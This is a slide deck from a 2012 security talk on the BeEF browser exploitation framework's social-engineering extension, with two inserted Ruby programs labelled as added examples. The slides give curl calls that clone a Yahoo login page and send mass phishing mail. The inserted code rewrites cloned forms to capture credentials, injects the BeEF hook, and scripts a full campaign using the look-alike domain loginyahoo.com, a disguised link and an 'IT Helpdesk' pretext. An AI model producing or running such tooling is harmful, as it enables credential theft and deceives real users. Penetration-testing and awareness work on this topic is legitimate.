I’m the Butcher, would you like some BeEF?

7th Sept 2012 - London
Michele ‘antisnatchor’ Orru
Thomas MacKenzie
Who are we

• Michele Orru, The Butcher
• Thomas MacKenzie, The Meat
Outline

• A Social Engineering real story
• BeEF intro
• The new BeEF Social Engineering extension
• Having fun with the RESTful API
Social Engineering

• “Social engineering, in the context of security, is understood to
  mean the art of manipulating people into performing actions or
  divulging confidential information.” - Grandfather of all knowledge
  (Wikipedia).
Our Mission...

• Tasked with gathering as many usernames and passwords as possible
  in a small amount of time
• Tried calling and pretending to be a person of authority, but
  awareness seemed to be higher
So...

• We heard great things about S.E.T. (the Social-Engineer Toolkit)
• Decided to use that to clone the website (but found some bugs and
  limitations that almost made it unusable)
Mass-Mailer

• With the help of a colleague we then created a basic mass-mailer
  that used personalization, HTML, pictures and had the ability to
  spoof the domain name (thanks to their SMTP server settings :-)
We Won

But The IT Admin was like...

• DO NOT CLICK ON THAT LINK

We then said (sending another email)...

• DO CLICK ON THAT LINK

AND... WE WON AGAIN!

But...

• We thought we could do it better and integrate some awesome
  client-side exploitation whilst we were at it...
Meet BeEF

• Browser Exploitation Framework
• Pioneered by Wade Alcorn in 2005
• Powerful platform for client-side pwnage, XSS post-exploitation and
  generally victim browser security-context abuse.
• The framework allows the penetration tester to select specific
  modules (in real-time) to target each browser, and therefore each
  context.
Meet BeEF

• Demo
Social Eng. extension

• The idea was to have some BeEF functionality that can be called via
  the RESTful API, in order to automate:
  • sending phishing emails using templates
  • cloning webpages and harvesting credentials
  • client-side pwnage

AND... WE DID IT!
BeEF web_cloner

• Clone a webpage and serve it on BeEF, then automatically:
  • modify the page to intercept POST requests (so the submitted
    credentials land on BeEF)
  • add the BeEF hook to it
  • if the original page can be framed (no X-Frame-Options header),
    load it in an overlay iFrame after the POST has been intercepted;
    otherwise redirect to the original page
BeEF web_cloner

  curl -H "Content-Type: application/json; charset=UTF-8" \
       -X POST \
       -d '{"url":"https://login.yahoo.com/config/login_verify2","mount":"/"}' \
       "http://<BeEF>/api/seng/clone_page?token=53921d2736116dbd86f8f7f7f10e46f1"

• token is the BeEF RESTful API key; it travels in the query string,
  so it ends up in proxy and web-server logs. Keep the BeEF admin/API
  port off the public interface.
• If you register loginyahoo.com, you can specify a mount point of
  /config/login_verify2, so the phishing URL will be (almost) the same
  as the original one.
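As an added example (not code from the slides or from BeEF itself), the following Ruby module is a simplified stand-in for the three things the web_cloner slide lists: repoint the login form at the mount where BeEF serves the clone so the POST carrying the credentials lands on BeEF, inject the BeEF hook script, and decide what to answer once the POST has been intercepted (overlay iframe of the original if it can be framed, otherwise a redirect). The BeEF URL, the mount point and the sample page are placeholders constructed for this example; the hook path /hook.js is BeEF's default.

```ruby
require 'cgi'

# Added example, not BeEF's own web_cloner code. Operates on the HTML of an
# already-fetched page; beef_url and mount are placeholders.
module MiniCloner
  FORM_TAG    = /<form\b[^>]*>/i
  ACTION_ATTR = /\baction\s*=\s*(["'])[^"']*\1/i

  # Constructed stand-in for a cloned login page (not the real Yahoo page).
  SAMPLE_PAGE = <<~HTML
    <html><head><title>Sign in</title></head>
    <body>
    <form method="post" action="https://login.yahoo.com/config/login_verify2">
      <input name="login"><input name="passwd" type="password">
      <input type="submit" value="Sign In">
    </form>
    </body></html>
  HTML

  # Rewrite the action of every form so it posts to the clone's mount point.
  # A form without an action posts to the current URL, which is already the
  # mount, so it is left untouched.
  def self.rewrite_forms(html, mount)
    html.gsub(FORM_TAG) do |tag|
      tag =~ ACTION_ATTR ? tag.sub(ACTION_ATTR, %(action="#{mount}")) : tag
    end
  end

  # Add the hook so every browser rendering the clone is hooked into BeEF.
  def self.inject_hook(html, beef_url)
    hook = %(<script src="#{beef_url}/hook.js" type="text/javascript"></script>)
    if html =~ %r{</body>}i
      html.sub(%r{</body>}i) { "#{hook}\n</body>" }
    else
      "#{html}\n#{hook}"
    end
  end

  # Full server-side transform applied to the fetched page before serving it.
  def self.clone(html, beef_url, mount)
    inject_hook(rewrite_forms(html, mount), beef_url)
  end

  # Can the original be shown in an overlay iframe from the clone's origin?
  # Not if it sends X-Frame-Options (DENY and SAMEORIGIN both block a foreign
  # origin) or a Content-Security-Policy carrying frame-ancestors.
  def self.frameable?(headers)
    h = Hash[headers.map { |k, v| [k.to_s.downcase, v.to_s] }]
    return false if h.key?('x-frame-options')
    (h['content-security-policy'].to_s =~ /frame-ancestors/i).nil?
  end

  # Reply once the POST has been captured: overlay the original page in a
  # full-window iframe if possible, otherwise send the victim straight to it.
  def self.post_response(original_url, frameable:)
    if frameable
      safe = CGI.escapeHTML(original_url)
      { status: 200, headers: { 'Content-Type' => 'text/html' },
        body: %(<iframe src="#{safe}" style="position:fixed;top:0;left:0;width:100%;height:100%;border:0"></iframe>) }
    else
      { status: 302, headers: { 'Location' => original_url }, body: '' }
    end
  end
end
```

The frameable? check is what a practitioner should run against the original page's response headers before choosing the overlay path; the redirect branch is the safe fallback whenever the check fails.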
BeEF web_cloner

• Demo
BeEF mass_mailer

• Do your phishing email campaigns:
  • get a sample email from your target (with company footer...)
  • copy the HTML content into a new BeEF email template
  • download images so they will be added inline!
  • add your malicious links/attachments
  • send the mail to X targets and have fun
BeEF mass_mailer

• email templates structure
• ‘default’ template HTML mail
• how the ‘default’ template email will look
BeEF mass_mailer

  curl -H "Content-Type: application/json; charset=UTF-8" \
       -X POST -d @body.json \
       "http://<BeEF>/api/seng/send_mails?token=0fda00ea62a1102f"

  with body.json:

  {
    "template": "default",
    "subject": "Hi from BeEF",
    "fromname": "BeEF",
    "link": "http://www.microsoft.com/",
    "linktext": "http://beefproject.com",
    "recipients": [{
      "user1@gmail.com": "Michele",
      "user2@antisnatchor.com": "Antisnatchor"
    }]
  }

• link is the href the mail really points at, linktext is what the
  reader sees, so the two can differ (as in the example above).
• recipients is a one-element array holding one object that maps each
  address to the display name used for personalization.
BeEF mass_mailer

• Demo
Combine everything FTW

• Register your phishing domain
• Point the A/MX records to a VPS where you have an SMTP server and BeEF
• Create a BeEF RESTful API script that:
  • clones a webpage with web_cloner
  • sends X emails with that link with mass_mailer
  • scripts intelligent attacks thanks to BeEF browser detection
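As an added example (not part of the slides or of BeEF itself), the following Ruby client ties the send_mails procedure and the "combine everything" steps above together: it builds the two RESTful API requests shown in the deck, POST /api/seng/clone_page and then POST /api/seng/send_mails, with the mailed link pointing at the look-alike domain plus the same mount point as the original path. The BeEF host, API token, phishing domain and recipients are placeholders; the request paths, query parameter and JSON fields are the ones the curl examples show.

```ruby
require 'json'
require 'net/http'
require 'uri'

# Added example, not BeEF's own code. Drives the Social Engineering extension
# over the RESTful API; beef_url, token and all campaign values are placeholders.
class BeefSengClient
  def initialize(beef_url, token)
    @beef  = URI(beef_url)
    @token = token
  end

  # clone_page body: the page to clone and the path BeEF should serve it on.
  def clone_page_body(url, mount)
    { 'url' => url, 'mount' => mount }
  end

  # send_mails body. As in the deck, recipients is a one-element array holding
  # one hash of address => display name; link is the real href, linktext what
  # the reader sees.
  def send_mails_body(template:, subject:, fromname:, link:, linktext:, recipients:)
    { 'template' => template, 'subject' => subject, 'fromname' => fromname,
      'link' => link, 'linktext' => linktext, 'recipients' => [recipients] }
  end

  # Phishing link carried by the mail: the look-alike domain plus the same
  # mount point as the original path, so the URL reads almost like the real one.
  def phishing_link(phish_domain, mount)
    "http://#{phish_domain}#{mount}"
  end

  # Endpoint URL. The API token goes in the query string, exactly as in the
  # curl examples, so it also ends up in any proxy or web-server log.
  def endpoint(path)
    uri = @beef.dup
    uri.path  = path
    uri.query = URI.encode_www_form('token' => @token)
    uri
  end

  # Plan the campaign without touching the network: the two requests, in
  # order, as [path, body] pairs that can be inspected before being sent.
  def plan_campaign(target_url:, mount:, phish_domain:, recipients:, subject:, fromname:)
    link = phishing_link(phish_domain, mount)
    [
      ['/api/seng/clone_page', clone_page_body(target_url, mount)],
      ['/api/seng/send_mails',
       send_mails_body(template: 'default', subject: subject, fromname: fromname,
                       link: link, linktext: target_url, recipients: recipients)]
    ]
  end

  # Send one planned request to BeEF and return the HTTP response.
  def post(path, body)
    uri = endpoint(path)
    req = Net::HTTP::Post.new(uri)
    req['Content-Type'] = 'application/json; charset=UTF-8'
    req.body = JSON.generate(body)
    Net::HTTP.start(uri.host, uri.port, use_ssl: uri.scheme == 'https') do |http|
      http.request(req)
    end
  end

  # Clone first, then mail, so the link is live before anyone clicks it.
  def run_campaign(**opts)
    plan_campaign(**opts).map { |path, body| post(path, body) }
  end
end

if $PROGRAM_NAME == __FILE__
  client = BeefSengClient.new('http://127.0.0.1:3000', ENV.fetch('BEEF_TOKEN', 'replace-with-api-token'))
  plan = client.plan_campaign(
    target_url: 'https://login.yahoo.com/config/login_verify2',
    mount: '/config/login_verify2',
    phish_domain: 'loginyahoo.com',
    recipients: { 'user1@example.com' => 'Michele' },
    subject: 'Please re-verify your account', fromname: 'IT Helpdesk')
  # Dry run: print the requests instead of sending them (use run_campaign to send).
  plan.each { |path, body| puts "POST #{client.endpoint(path)} #{JSON.generate(body)}" }
end
```

plan_campaign is kept separate from post so the exact JSON and URLs can be reviewed (and the token kept out of shell history) before a single mail leaves the VPS; run_campaign is the one-shot version for a scripted engagement.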
Combine everything FTW

• Last demo

BeEF web_cloner + mass_mailer + RESTful API =
Thanks

• Wade, for always being awesome
• The other BeEF guys: Brendan, Christian, Ben, Saafan, Ryan, Heather
• A few new project joiners: Bart Leppens, gallypette, Quentin Swain
• Tom Neaves for the butcher/hook images :D

Questions?

